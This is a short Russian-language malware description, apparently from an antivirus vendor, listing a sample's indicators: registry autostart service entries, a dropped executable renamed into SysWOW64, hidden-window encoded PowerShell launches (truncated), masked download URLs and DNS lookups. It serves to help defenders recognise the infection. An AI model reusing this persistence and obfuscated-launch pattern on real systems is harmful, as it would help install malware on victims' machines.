Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\endifknown] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\endifknown] 'ImagePath' = '"%WINDIR%\SysWOW64\endifknown.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABZAHkAdAB3AHMAYgBoAHoAegBvAD0AJwBVAHgAcABjAHkAYQBhAGQAJwA7ACQARgB4AGkAdQBlAHIAegBpAHIAbgAgAD0AIAAnADQANwA2ACcAOwAkAEEAegB4AGYAdQB1AGkAbAB0AD0AJwBUAHoAeQBwAGIAbwB2AHIAawBxACcAOwAkAFEAZAB...
- %HOMEPATH%\476.exe
- %HOMEPATH%\476.exe в %WINDIR%\syswow64\endifknown.exe
- http://ve#####ongnghiepqd.com/wp-content/2ff6395/
- http://11#.#19.233.65/xian/
- DNS ASK th####pprint.com
- DNS ASK ve#####ongnghiepqd.com
- DNS ASK hp######htaophongcach.com
- '%HOMEPATH%\476.exe'
- '%WINDIR%\syswow64\endifknown.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABZAHkAdAB3AHMAYgBoAHoAegBvAD0AJwBVAHgAcABjAHkAYQBhAGQAJwA7ACQARgB4AGkAdQBlAHIAegBpAHIAbgAgAD0AIAAnADQANwA2ACcAOwAkAEEAegB4AGYAdQB1AGkAbAB0AD0AJwBUAHoAeQBwAGIAbwB2AHIAawBxACcAOwAkAFEAZAB...' (со скрытым окном)